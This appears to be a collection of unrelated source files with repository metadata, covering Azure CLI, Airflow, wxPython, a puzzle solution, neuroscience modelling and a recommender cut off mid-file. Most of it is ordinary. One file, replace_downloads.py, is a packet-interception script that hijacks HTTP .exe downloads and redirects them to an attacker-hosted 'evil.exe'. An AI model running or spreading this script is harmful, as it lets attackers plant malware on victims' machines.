1d6d55a629040d2a4f5a21a40cb2d8c050150aa4 | a4ea525e226d6c401fdb87a6e9adfdc5d07e6020 | /src/azure-cli/azure/cli/command_modules/network/aaz/latest/network/nat/gateway/_show.py | 1f3a7021343df279377f28627289aacc60a9f5b9 | [
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] | permissive | Azure/azure-cli | 13340eeca2e288e66e84d393fa1c8a93d46c8686 | a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca | refs/heads/dev | 2023-08-17T06:25:37.431463 | 2023-08-17T06:00:10 | 2023-08-17T06:00:10 | 51,040,886 | 4,018 | 3,310 | MIT | 2023-09-14T11:11:05 | 2016-02-04T00:21:51 | Python | UTF-8 | Python | false | false | 7,741 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#
# Code generated by aaz-dev-tools
# --------------------------------------------------------------------------------------------
# pylint: skip-file
# flake8: noqa
from azure.cli.core.aaz import *
@register_command(
"network nat gateway show",
)
class Show(AAZCommand):
"""Show details of a NAT gateway.
:example: Show details of a NAT gateway.
az network nat gateway show --resource-group MyResourceGroup --name MyNatGateway
:example: Show NAT gateway using ID.
az network nat gateway show --ids {GatewayId}
"""
_aaz_info = {
"version": "2022-01-01",
"resources": [
["mgmt-plane", "/subscriptions/{}/resourcegroups/{}/providers/microsoft.network/natgateways/{}", "2022-01-01"],
]
}
def _handler(self, command_args):
super()._handler(command_args)
self._execute_operations()
return self._output()
_args_schema = None
@classmethod
def _build_arguments_schema(cls, *args, **kwargs):
if cls._args_schema is not None:
return cls._args_schema
cls._args_schema = super()._build_arguments_schema(*args, **kwargs)
# define Arg Group ""
_args_schema = cls._args_schema
_args_schema.name = AAZStrArg(
options=["-n", "--name"],
help="Name of the NAT gateway.",
required=True,
id_part="name",
)
_args_schema.resource_group = AAZResourceGroupNameArg(
required=True,
)
return cls._args_schema
def _execute_operations(self):
self.pre_operations()
self.NatGatewaysGet(ctx=self.ctx)()
self.post_operations()
@register_callback
def pre_operations(self):
pass
@register_callback
def post_operations(self):
pass
def _output(self, *args, **kwargs):
result = self.deserialize_output(self.ctx.vars.instance, client_flatten=True)
return result
class NatGatewaysGet(AAZHttpOperation):
CLIENT_TYPE = "MgmtClient"
def __call__(self, *args, **kwargs):
request = self.make_request()
session = self.client.send_request(request=request, stream=False, **kwargs)
if session.http_response.status_code in [200]:
return self.on_200(session)
return self.on_error(session.http_response)
@property
def url(self):
return self.client.format_url(
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/natGateways/{natGatewayName}",
**self.url_parameters
)
@property
def method(self):
return "GET"
@property
def error_format(self):
return "ODataV4Format"
@property
def url_parameters(self):
parameters = {
**self.serialize_url_param(
"natGatewayName", self.ctx.args.name,
required=True,
),
**self.serialize_url_param(
"resourceGroupName", self.ctx.args.resource_group,
required=True,
),
**self.serialize_url_param(
"subscriptionId", self.ctx.subscription_id,
required=True,
),
}
return parameters
@property
def query_parameters(self):
parameters = {
**self.serialize_query_param(
"api-version", "2022-01-01",
required=True,
),
}
return parameters
@property
def header_parameters(self):
parameters = {
**self.serialize_header_param(
"Accept", "application/json",
),
}
return parameters
def on_200(self, session):
data = self.deserialize_http_content(session)
self.ctx.set_var(
"instance",
data,
schema_builder=self._build_schema_on_200
)
_schema_on_200 = None
@classmethod
def _build_schema_on_200(cls):
if cls._schema_on_200 is not None:
return cls._schema_on_200
cls._schema_on_200 = AAZObjectType()
_schema_on_200 = cls._schema_on_200
_schema_on_200.etag = AAZStrType(
flags={"read_only": True},
)
_schema_on_200.id = AAZStrType()
_schema_on_200.location = AAZStrType()
_schema_on_200.name = AAZStrType(
flags={"read_only": True},
)
_schema_on_200.properties = AAZObjectType(
flags={"client_flatten": True},
)
_schema_on_200.sku = AAZObjectType()
_schema_on_200.tags = AAZDictType()
_schema_on_200.type = AAZStrType(
flags={"read_only": True},
)
_schema_on_200.zones = AAZListType()
properties = cls._schema_on_200.properties
properties.idle_timeout_in_minutes = AAZIntType(
serialized_name="idleTimeoutInMinutes",
)
properties.provisioning_state = AAZStrType(
serialized_name="provisioningState",
flags={"read_only": True},
)
properties.public_ip_addresses = AAZListType(
serialized_name="publicIpAddresses",
)
properties.public_ip_prefixes = AAZListType(
serialized_name="publicIpPrefixes",
)
properties.resource_guid = AAZStrType(
serialized_name="resourceGuid",
flags={"read_only": True},
)
properties.subnets = AAZListType(
flags={"read_only": True},
)
public_ip_addresses = cls._schema_on_200.properties.public_ip_addresses
public_ip_addresses.Element = AAZObjectType()
_ShowHelper._build_schema_sub_resource_read(public_ip_addresses.Element)
public_ip_prefixes = cls._schema_on_200.properties.public_ip_prefixes
public_ip_prefixes.Element = AAZObjectType()
_ShowHelper._build_schema_sub_resource_read(public_ip_prefixes.Element)
subnets = cls._schema_on_200.properties.subnets
subnets.Element = AAZObjectType()
_ShowHelper._build_schema_sub_resource_read(subnets.Element)
sku = cls._schema_on_200.sku
sku.name = AAZStrType()
tags = cls._schema_on_200.tags
tags.Element = AAZStrType()
zones = cls._schema_on_200.zones
zones.Element = AAZStrType()
return cls._schema_on_200
class _ShowHelper:
"""Helper class for Show"""
_schema_sub_resource_read = None
@classmethod
def _build_schema_sub_resource_read(cls, _schema):
if cls._schema_sub_resource_read is not None:
_schema.id = cls._schema_sub_resource_read.id
return
cls._schema_sub_resource_read = _schema_sub_resource_read = AAZObjectType()
sub_resource_read = _schema_sub_resource_read
sub_resource_read.id = AAZStrType()
_schema.id = cls._schema_sub_resource_read.id
__all__ = ["Show"]
| [
"noreply@github.com"
] | Azure.noreply@github.com |
0749a6002445ed54ada4865f9d8ead88709f8e04 | 29487730c77ae4e875ed8f69d3aceef2103fc0a3 | /fatcatmap/models/abstract/event.py | c93f570669e0aaedbbc3a8c0174e8256b06fac65 | [] | no_license | sgammon/fatcatmap | 154665fdd9394e0802d1bce9d0d747f3f9bfe3b2 | 4c83d1bfc146f48ac2d1d6b240624a7ece57911e | refs/heads/master | 2021-03-30T15:41:15.837040 | 2014-12-09T20:38:50 | 2014-12-09T20:38:50 | 15,307,179 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 357 | py | # -*- coding: utf-8 -*-
'''
fcm: abstract event models
'''
# stdlib
from datetime import datetime
# graph models
from .. import (Model,
describe)
@describe(abstract=True)
class Event(Model):
''' Specifies an action that occurred at a specific (or
vague) single moment in time. '''
occurred = datetime, {'indexed': True}
| [
"sam@momentum.io"
] | sam@momentum.io |
311119c4a533fb84b1644a51b05a305f2728fa5b | bd58eb56167680e5c07c1e6e630c03f2f73a3647 | /replace_downloads/replace_downloads.py | ab5264c1faddd4658ae864b61571d3c4340698b5 | [] | no_license | denier1025/PycharmProjects | 40e7ac879993e2e4b0ad7b0c547790a2554406eb | 411f8ae04c4ba4f6835d2cd66b5490223a863b2f | refs/heads/master | 2020-03-27T06:14:39.127989 | 2018-09-10T19:51:24 | 2018-09-10T19:51:24 | 146,091,707 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,671 | py | #!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy
import subprocess
import argparse
ack_list = []
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("-c0", "--chain0", dest="chain_name0", help="Chain name: FORWARD, OUTPUT, INPUT etc.")
parser.add_argument("-c1", "--chain1", dest="chain_name1", help="Chain name: FORWARD, OUTPUT, INPUT etc.")
parser.add_argument("-qn", "--queue-num", dest="queue_num", help="Queue number: 0, 1, 3 etc.")
options = parser.parse_args()
if not options.chain_name0:
parser.error("Please, specify a chain name, use --help for more info")
elif not options.queue_num:
parser.error("Please, specify a queue number, use --help for more info")
else:
if ("OUTPUT" or "INPUT") == options.chain_name0:
if not options.chain_name1:
parser.error("Please, specify a chain name, use --help for more info")
return options
def presets_for_intercept_and_modify_packets(options):
if options.chain_name1:
subprocess.call(["iptables", "-I", options.chain_name1, "-j", "NFQUEUE", "--queue-num", options.queue_num])
subprocess.call(["iptables", "-I", options.chain_name0, "-j", "NFQUEUE", "--queue-num", options.queue_num])
def flush_presets():
subprocess.call("iptables --flush", shell=True)
def set_load_link(packet, load_link):
packet[scapy.Raw].load = "HTTP/1.1 301 Moved Permanently\r\nLocation: " + load_link + "\r\n\r\n"
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packet
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == 80:
if ".exe" in scapy_packet[scapy.Raw].load:
print("exe Request")
ack_list.append(scapy_packet[scapy.TCP].ack)
elif scapy_packet[scapy.TCP].sport == 80:
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq)
print("Replacing file")
modified_packet = set_load_link(scapy_packet, "http://10.0.2.15/files/evil.exe")
packet.set_payload(str(modified_packet))
packet.accept()
options = get_args()
presets_for_intercept_and_modify_packets(options)
try:
queue = netfilterqueue.NetfilterQueue()
queue.bind(int(options.queue_num), process_packet)
queue.run()
except KeyboardInterrupt:
print("\nDetecting 'CTRL+C'... Flushing IP-tables... Please wait...")
flush_presets()
print("IP-tables were flushing successfully!") | [
"root@localhost.localdomain"
] | root@localhost.localdomain |
f55d7cfc44bac29fc91d4cf46061f70481c026ed | e0b6f5bd451aa8af3273fbc948799637681342e1 | /scripts/wm_representation/functions/IEM/tools/Weights_matrix_LM_3items.py | 423fd194f89fcea7ee5da1725dfd4a8d6bacfb41 | [] | no_license | davidbestue/encoding | 6b304f6e7429f94f97bd562c7544d1fdccf7bdc1 | c27319aa3bb652b3bfc6b7340044c0fda057bc62 | refs/heads/master | 2022-05-05T23:41:42.419252 | 2022-04-27T08:34:52 | 2022-04-27T08:34:52 | 144,248,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,184 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Apr 29 13:05:33 2019
@author: David
"""
import sys, os
path_tools = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
sys.path.insert(1, path_tools)
from tools import *
def Weights_matrix_LM_3items( training_data, training_angles ):
# no intercept
# no regressors scaling
# training_angles is a vector of [a1, a2, a3]
#####
start_train_weights = time.time()
#####
n_voxels = np.shape(training_data)[1]
### Expected activity from the model
M_model=[] #matrix of the activity from the model
for i in range(len(training_angles)):
channel_values1=f(training_angles[i][0]) #f #f_quadrant (function that generates the expectd reponse in each channel)
channel_values2=f(training_angles[i][1])
channel_values3=f(training_angles[i][2])
channel_values = np.array(channel_values1) + np.array(channel_values2) + np.array(channel_values3)
channel_values = list(channel_values)
M_model.append(channel_values)
M_model=pd.DataFrame(np.array(M_model)) # (trials, channel_activity)
channel_names = ['ch_' +str(i+1) for i in range(0, len(pos_channels))] #names of the channels
M_model.columns=channel_names
#### 2. Train the model and get matrix of weights
Matrix_weights=np.zeros(( n_voxels, len(pos_channels) )) # (voxels, channels) how each channels is represented in each voxel
for voxel_x in range(0, n_voxels): #train each voxel
# set Y and X for the GLM
Y = training_data[:, voxel_x] ## Y is the real activity
X = M_model #_zscored #M_model ## X is the hipothetycal activity
##
a = sm.OLS(Y, X )
resul = a.fit()
betas= resul.params
Matrix_weights[voxel_x, :]=betas
#Save the matrix of weights
Matrix_weights =pd.DataFrame(Matrix_weights) #convert the array to dataframe
end_train_weights = time.time()
process_train_weights = end_train_weights - start_train_weights
##print( 'Time train Weights: ' +str(process_train_weights))
Inter = False #intercept true or false
return Matrix_weights, Inter
| [
"davidsanchezbestue@hotmail.com"
] | davidsanchezbestue@hotmail.com |
7346dc2a4751f2adbec6fe72f886800613002c7e | b1bab1dca289b2447c0b7a6b2e41f6e61fc048df | /TEST/A형모의삼국지.py | 0f97c63d8257949edae6a7aa5415e57818df7f28 | [] | no_license | DongChanKIM2/Algorithm | bf267ddf4234f0da6552a559f43cac073e7ca133 | 2613462f65a2cda7e32c6f96cee2cd67733c9883 | refs/heads/main | 2023-08-24T10:46:12.330145 | 2021-10-11T06:31:56 | 2021-10-11T06:31:56 | 356,710,352 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,469 | py | #1. 땅따먹기 게임
# Rule 1. 산악지대는 무조건 0
# Rule 2. 주병력/보조병력으로 나뉘어져 이씀
# Rule 3. 공격 -> 지원 -> 보충 (1번나라 -> 2번나라 -> 3번나라) 병력이 없다면 skip
# Rule 4. 공격: 내 공격 turn일때 (인접한 상대 나라의 병력 * 5) < (내 나라 병력) 이면 1/4씩 보내서 공격
# 즉 무조건 침공가능할때만 공격하는 것임
# Rule 5. 지원:
# 5-1. 인접한 국가 중 다른나라가 없으면 인접한 지역으로 1/5 병력 보냄
# 5-2. 인접한 국가 중 다른나라가 있으면 5배 벙력 초과일때만 1/5 병력 보냄
# Rule 6.게임종료: 한 국가만 남았을 때
# 게임순서: 파 -> 초 -> 주
dx = [1, -1, 0, 0]
dy = [0, 0, 1, -1]
# 순서대로 공격하면 공격인원이 나뉘게 됨
# 1. 적군기준으로 사방향탐색해서 공격하는 곳인지 정하고 (attack 함수)
# 2. 아군기준으로 공격을 한번에 해야함 (adjacent_cnt arr)
def attack(which_country):
for i in range(N):
for j in range(N):
conquerd_arr[i][j] = 0
for i in range(N):
for j in range(N):
# 산악지대가아닌 적군의 위치를 찾자
if arr[i][j] != which_country and arr[i][j] != 0:
cnt = 0
for direction in range(4):
nx = i + dx[direction]
ny = j + dy[direction]
if nx >= N or ny >= N or nx < 0 or ny < 0:
continue
# 적군의 위치에서 사방탐색을 해서 아군의 숫자 찾기
if arr[nx][ny] == which_country:
cnt += military[nx][ny]
if cnt > (military[i][j] * 5):
conquerd_arr[i][j] = 1
def send(which_country):
for i in range(N):
for j in range(N):
adjacent_cnt_arr[i][j] = 0
# 병력을 보내는 지점에 몇 번 병력을 보내는지 cnt
for i in range(N):
for j in range(N):
if conquerd_arr[i][j] == 1:
for direction in range(4):
nx = i + dx[direction]
ny = j + dy[direction]
if nx >= N or ny >= N or nx < 0 or ny < 0:
continue
if arr[nx][ny] == which_country:
adjacent_cnt_arr[nx][ny] += 1
# 실제 침공부터 하자
for i in range(N):
for j in range(N):
if conquerd_arr[i][j] == 1:
send_military_cnt = 0
for direction in range(4):
nx = i + dx[direction]
ny = j + dy[direction]
if nx >= N or ny >= N or nx < 0 or ny < 0:
continue
if adjacent_cnt_arr[nx][ny] > 0:
send_military_cnt += int(military[nx][ny] * (1/4))
military[i][j] = send_military_cnt - military[i][j]
# 나라도 바꿔주고
arr[i][j] = which_country
# 병력도 바꿔주고
military[i][j] = int(military[i][j])
# 보낸 병력도 적용해야지
for i in range(N):
for j in range(N):
if adjacent_cnt_arr[i][j] > 0:
military[i][j] -= adjacent_cnt_arr[i][j] * int(military[i][j] * (1/4))
# int(((adjacent_cnt_arr[i][j]/4) * military[i][j]))
military[i][j] = int(military[i][j])
adjacent_cnt_arr[i][j] = 0
conquerd_arr[i][j] = 0
# 지원부터 하자(이거하고나서 보충)
# Rule 5. 지원:
# 5-1. 인접한 국가 중 다른나라가 없으면 인접한 지역으로 1/5 병력 보냄
# 5-2. 인접한 국가 중 다른나라가 있으면 5배 벙력 초과일때만 1/5 병력 보냄
# 아... 생각해보니까 5-1, 5-2를 순차적으로 진행하면 안되고 동시에 해야된다.. shit...
# temp_military를 만들어서 5-1, 5-2의 차이를 더해주고 temp_military를 합치는 방향으로 가는게 맞겟다
def advocate(which_country):
for i in range(N):
for j in range(N):
temp_military[i][j] = 0
# 5-1부터 구현
for i in range(N):
for j in range(N):
if arr[i][j] == which_country:
flag = 0
for direction in range(4):
nx = i + dx[direction]
ny = j + dy[direction]
if nx >= N or ny >= N or nx < 0 or ny < 0:
continue
if arr[nx][ny] == 0:
continue
if arr[nx][ny] != arr[i][j]:
flag = 1
# 사방에 아군밖에 없는 경우
cnt = 0
if flag == 0:
# 병력을 다 보내고
for direction in range(4):
nx = i + dx[direction]
ny = j + dy[direction]
if nx >= N or ny >= N or nx < 0 or ny < 0:
continue
if arr[nx][ny] == which_country:
temp_military[nx][ny] += int(military[i][j] * 0.2)
cnt += 1
# 내꺼에서 병력을 빼주자
temp_military[i][j] -= int(military[i][j] * 0.2) * cnt
# print('---', int(military[i][j] * (0.2)))
# temp_military[i][j] = int(temp_military[i][j])
# 사방중에 적군이 있는 경우
elif flag == 1:
for direction in range(4):
nx = i + dx[direction]
ny = j + dy[direction]
if nx >= N or ny >= N or nx < 0 or ny < 0:
continue
if arr[nx][ny] == which_country:
if military[i][j] > military[nx][ny] * 5:
temp_military[nx][ny] += int(military[i][j] * 0.2)
# temp_military[nx][ny] = int(temp_military[nx][ny])
temp_military[i][j] -= int(military[i][j] * 0.2)
# temp_military[i][j] = int(temp_military[i][j])
for i in range(N):
for j in range(N):
military[i][j] += temp_military[i][j]
def suppling():
for i in range(N):
for j in range(N):
military[i][j] += supply[i][j]
# 파: 1, 초: 2, 주: 3
T = int(input())
for tc in range(T):
N = int(input())
arr = [list(map(int, input().split())) for _ in range(N)]
military = [list(map(int, input().split())) for _ in range(N)]
supply = [list(map(int, input().split())) for _ in range(N)]
# 침략당했다라고 표시할 arr
conquerd_arr = [[0] * N for _ in range(N)]
# 침략하려고 공격을 보내는 지점 표시할 arr
adjacent_cnt_arr = [[0] * N for _ in range(N)]
# 지원보낼때 적군과 인접한 곳과 아닌곳 합쳐줄 arr
temp_military = [[0] * N for _ in range(N)]
ans = 0
temp = 0
first = 0
second = 0
third = 0
zero = 0
while True:
if first + zero == N ** 2:
break
if second + zero == N ** 2:
break
if third + zero == N ** 2:
break
first = 0
second = 0
third = 0
zero = 0
execute = 0
temp += 1
if temp >= 4:
temp -= 3
idx = temp
for i in range(N):
for j in range(N):
if arr[i][j] == idx:
execute = 1
if execute == 1:
attack(idx)
send(idx)
advocate(idx)
suppling()
for i in range(N):
for j in range(N):
if arr[i][j] == 0:
zero += 1
if arr[i][j] == 1:
first += 1
if arr[i][j] == 2:
second += 1
if arr[i][j] == 3:
third += 1
# print(conquerd_arr)
# print(adjacent_cnt_arr)
# print(arr)
# print(military)
# print(temp_military)
for i in range(N):
for j in range(N):
ans += military[i][j]
print('#{} {}'.format(tc+1, ans))
# print(sum(military))
| [
"fromecha@gmail.com"
] | fromecha@gmail.com |
86dcef936a9635a57846cbb64347fec7aede84f9 | 562446b9c0b39dd74a079678fab235ad7f9b8fb2 | /enaml/wx/wx_group_box.py | cc12ceba9a849c5b309913381a5286bd49ec7dbe | [
"BSD-3-Clause"
] | permissive | jminardi/enaml | 2679bbb992101e07b1d780bd622c5ccb08cb329e | 78446e5163e026d9abf9568f99252615e9e2e380 | refs/heads/master | 2021-01-23T22:37:54.033419 | 2014-07-22T02:30:21 | 2014-07-22T02:30:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,127 | py | #------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
import wx
from atom.api import Typed
from enaml.widgets.group_box import ProxyGroupBox
from .wx_container import WxContainer, wxContainer
WX_ALIGNMENTS = {
'left': wx.ALIGN_LEFT,
'center': wx.ALIGN_CENTER,
'right': wx.ALIGN_RIGHT,
}
class wxGroupBox(wxContainer):
""" A wxContainer sublcass that implements GroupBox functionality.
"""
def __init__(self, *args, **kwargs):
""" Initialize a wxGroupBox.
Parameters
----------
*args, **kwargs
The positional and keyword arguments to initialize a
wxContainer.
"""
super(wxGroupBox, self).__init__(*args, **kwargs)
self._title = ''
self._border = wx.StaticBox(self)
self._line = wx.StaticLine(self)
self._label = wx.StaticText(self)
self._label.Raise()
self._label_size = self._label.GetBestSize()
self._title_alignment = wx.ALIGN_LEFT
self._flat = False
# Set the panel to double buffered or suffer terrible
# rendering artifacts
self.SetDoubleBuffered(True)
#--------------------------------------------------------------------------
# Public API
#--------------------------------------------------------------------------
def GetAlignment(self):
""" Return the wx alignment flag for the current alignment
of the group box title.
"""
return self._title_alignment
def SetAlignment(self, alignment):
""" Set the alignment of the title of the group box. Should
be one of wx.ALIGN_LEFT, wx.ALIGN_RIGHT, wx.ALIGN_CENTER.
"""
self._title_alignment = alignment
self._update_layout()
def GetFlat(self):
""" Returns a boolean indicating whether the group box is using
a flat style.
"""
return self._flat
def SetFlat(self, flat):
""" Set whether or not the group box should be displayed using
a flat style.
"""
self._flat = flat
if flat:
self._border.Show(False)
self._line.Show(True)
else:
self._border.Show(True)
self._line.Show(False)
self._update_layout()
def GetTitle(self):
""" Return the current title text in the group box.
"""
# Undo the hack applied in SetTitle(...)
title = self._title
if title:
title = title[1:-1]
return title
def SetTitle(self, title):
""" Set the current title text in the group box.
"""
# A bit of a hack to give us a little padding around the label
if title:
title = ' %s ' % title
self._title = title
self._label.SetLabel(title)
self._label_size = self._label.GetBestSize()
if not title:
self._label.Show(False)
else:
self._label.Show(True)
self._update_layout()
def SetDimensions(self, x, y, width, height):
""" Overridden parent class method to synchronize the group
box decorations.
"""
super(wxGroupBox, self).SetDimensions(x, y, width, height)
self._update_layout()
def SetSize(self, size):
""" Overridden parent class method to synchronize the group
box decorations.
"""
super(wxGroupBox, self).SetSize(size)
self._update_layout()
def GetContentsMargins(self):
""" Get the contents margins for the group box.
These margins are computed empirically so that they look similar
to the margins provided by Qt on Windows.
Returns
-------
result : tuple
The top, right, bottom, and left margin values.
"""
label = self._label
height = label.GetCharHeight()
if not label.IsShown():
height /= 2
return (height, 1, 1, 1)
#--------------------------------------------------------------------------
# Private API
#--------------------------------------------------------------------------
def _update_layout(self):
""" Synchronizes the drawing of the group box decorations with
the panel.
"""
if self._flat:
self._update_line_geometry()
else:
self._update_border_geometry()
self._update_title_geometry()
self.Refresh()
def _update_border_geometry(self):
""" Updates the geometry of the border.
"""
width, height = self.GetSizeTuple()
self._border.SetSizeWH(width, height)
def _update_line_geometry(self):
""" Updates the geometry of the line.
"""
y = self._label_size.GetHeight() / 2
width, _ = self.GetSizeTuple()
self._line.SetDimensions(0, y, width, 2)
def _update_title_geometry(self):
""" Updates the geometry of the title.
"""
label = self._label
flat = self._flat
align = self._title_alignment
text_width, _ = self._label_size
width, _ = self.GetSizeTuple()
# These offsets are determined empirically to look similar
# in form to Qt on Windows
if align == wx.ALIGN_LEFT:
x = 0 if flat else 8
label.Move((x, 0))
elif align == wx.ALIGN_RIGHT:
right = width
right -= 0 if flat else 8
x = right - text_width
label.Move((x, 0))
elif align == wx.ALIGN_CENTER:
label.CenterOnParent(dir=wx.HORIZONTAL)
else:
raise ValueError('Invalid title alignment %s' % align)
class WxGroupBox(WxContainer, ProxyGroupBox):
""" A Wx implementation of an Enaml ProxyGroupBox.
"""
#: A reference to the widget created by the proxy.
widget = Typed(wxGroupBox)
#--------------------------------------------------------------------------
# Initialization API
#--------------------------------------------------------------------------
def create_widget(self):
""" Creates the underlying QGroupBox control.
"""
self.widget = wxGroupBox(self.parent_widget())
def init_widget(self):
""" Initialize the underlying widget.
"""
super(WxGroupBox, self).init_widget()
d = self.declaration
self.set_title(d.title, cm_update=False)
self.set_flat(d.flat)
self.set_title_align(d.title_align)
#--------------------------------------------------------------------------
# Layout Handling
#--------------------------------------------------------------------------
@staticmethod
def margins_func(widget):
""" Get the current contents margins for the group box.
"""
return widget.GetContentsMargins()
#--------------------------------------------------------------------------
# ProxyGroupBox API
#--------------------------------------------------------------------------
def set_title(self, title, cm_update=True):
""" Update the title of the group box.
"""
if not cm_update:
self.widget.SetTitle(title)
return
widget = self.widget
old_margins = widget.GetContentsMargins()
widget.SetTitle(title)
new_margins = widget.GetContentsMargins()
if old_margins != new_margins:
self.margins_updated()
def set_flat(self, flat):
""" Updates the flattened appearance of the group box.
"""
self.widget.SetFlat(flat)
def set_title_align(self, align):
""" Updates the alignment of the title of the group box.
"""
wx_align = WX_ALIGNMENTS[align]
self.widget.SetAlignment(wx_align)
| [
"sccolbert@gmail.com"
] | sccolbert@gmail.com |
f43b483dfeb3751246fc8febb721f04195a9a24a | 7137161629a1003583744cc3bd0e5d3498e0a924 | /airflow/providers/amazon/aws/example_dags/example_eks_using_defaults.py | 12a80fb4e6e270cea1e79d99caefb113099997a8 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | jbampton/airflow | 3fca85975854eb916f16143b659a9119af143963 | dcfa14d60dade3fdefa001d10013466fe4d77f0d | refs/heads/master | 2023-05-25T22:31:49.104069 | 2021-09-18T19:18:32 | 2021-09-18T19:18:32 | 247,645,744 | 3 | 0 | Apache-2.0 | 2020-03-16T08:12:58 | 2020-03-16T08:12:57 | null | UTF-8 | Python | false | false | 3,917 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from os import environ
from airflow.models.dag import DAG
from airflow.providers.amazon.aws.hooks.eks import ClusterStates, NodegroupStates
from airflow.providers.amazon.aws.operators.eks import (
EKSCreateClusterOperator,
EKSDeleteClusterOperator,
EKSPodOperator,
)
from airflow.providers.amazon.aws.sensors.eks import EKSClusterStateSensor, EKSNodegroupStateSensor
from airflow.utils.dates import days_ago
CLUSTER_NAME = 'eks-demo'
NODEGROUP_SUFFIX = '-nodegroup'
NODEGROUP_NAME = CLUSTER_NAME + NODEGROUP_SUFFIX
ROLE_ARN = environ.get('EKS_DEMO_ROLE_ARN', 'arn:aws:iam::123456789012:role/role_name')
SUBNETS = environ.get('EKS_DEMO_SUBNETS', 'subnet-12345ab subnet-67890cd').split(' ')
VPC_CONFIG = {
'subnetIds': SUBNETS,
'endpointPublicAccess': True,
'endpointPrivateAccess': False,
}
with DAG(
dag_id='example_eks_using_defaults_dag',
schedule_interval=None,
start_date=days_ago(2),
max_active_runs=1,
tags=['example'],
) as dag:
# [START howto_operator_eks_create_cluster_with_nodegroup]
# Create an Amazon EKS cluster control plane and an EKS nodegroup compute platform in one step.
create_cluster_and_nodegroup = EKSCreateClusterOperator(
task_id='create_eks_cluster_and_nodegroup',
cluster_name=CLUSTER_NAME,
nodegroup_name=NODEGROUP_NAME,
cluster_role_arn=ROLE_ARN,
nodegroup_role_arn=ROLE_ARN,
# Opting to use the same ARN for the cluster and the nodegroup here,
# but a different ARN could be configured and passed if desired.
resources_vpc_config=VPC_CONFIG,
# Compute defaults to 'nodegroup' but is called out here for the purposed of the example.
compute='nodegroup',
)
# [END howto_operator_eks_create_cluster_with_nodegroup]
await_create_nodegroup = EKSNodegroupStateSensor(
task_id='wait_for_create_nodegroup',
cluster_name=CLUSTER_NAME,
nodegroup_name=NODEGROUP_NAME,
target_state=NodegroupStates.ACTIVE,
)
start_pod = EKSPodOperator(
task_id="run_pod",
pod_name="run_pod",
cluster_name=CLUSTER_NAME,
image="amazon/aws-cli:latest",
cmds=["sh", "-c", "ls"],
labels={"demo": "hello_world"},
get_logs=True,
# Delete the pod when it reaches its final state, or the execution is interrupted.
is_delete_operator_pod=True,
)
# [START howto_operator_eks_force_delete_cluster]
# An Amazon EKS cluster can not be deleted with attached resources.
# Setting the `force` to `True` will delete any attached resources before deleting the cluster.
delete_all = EKSDeleteClusterOperator(
task_id='delete_nodegroup_and_cluster', cluster_name=CLUSTER_NAME, force_delete_compute=True
)
# [END howto_operator_eks_force_delete_cluster]
await_delete_cluster = EKSClusterStateSensor(
task_id='wait_for_delete_cluster',
cluster_name=CLUSTER_NAME,
target_state=ClusterStates.NONEXISTENT,
)
create_cluster_and_nodegroup >> await_create_nodegroup >> start_pod >> delete_all >> await_delete_cluster
| [
"noreply@github.com"
] | jbampton.noreply@github.com |
81f504ac97ca0003faf28ebe4384c00b0c873734 | adc1dea2a624af5a3d0564083d521942db77e5cf | /knn_cb_popularity_single.py | 3cfaf45ca93d5b4e167325cc09b7adac20e18674 | [] | no_license | Hadryan/Music_recommender-2 | 7052ac999daf039b2c269ce30a19cf57a5bde3e4 | a92ec61eef679b5b848fa2199ff613412db43c0d | refs/heads/main | 2023-04-24T01:11:57.877872 | 2021-05-25T17:47:28 | 2021-05-25T17:47:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,589 | py | # -*- coding: utf-8 -*-
"""
KNN Content-Based Recommendation
"""
# data science imports
import numpy as np
import pandas as pd
from sklearn.neighbors import NearestNeighbors
import sklearn.preprocessing as skpp
# Scale and normalize data
def scale_norm(data_numerical):
# Remove row if there's NA values and convert to numpy array
data_knn = data_numerical.dropna(axis = 0, how = 'any')
data_knn = np.asarray(data_knn)
# scale data
data_knn = skpp.scale(data_knn, axis = 0)
# normalize data
stdA = np.std(data_knn,axis = 0)
stdA = skpp.normalize(stdA.reshape(1,-1)) # the normalize is different from MATLAB's
data_knn_scale = data_knn @ np.diag(np.ones(stdA.shape[1])/stdA[0])
# extract attributes from raw data
m,n = data_knn_scale.shape
# print('size of the data:',m,n)
return data_knn_scale
# Knn Recommendation
def knn_rank(model_knn, seed_track, data_id, data_knn_scale, num_neighbor):
distances, indices = model_knn.kneighbors(seed_track, n_neighbors = num_neighbor + 1)
# get list of raw idx of recommendations
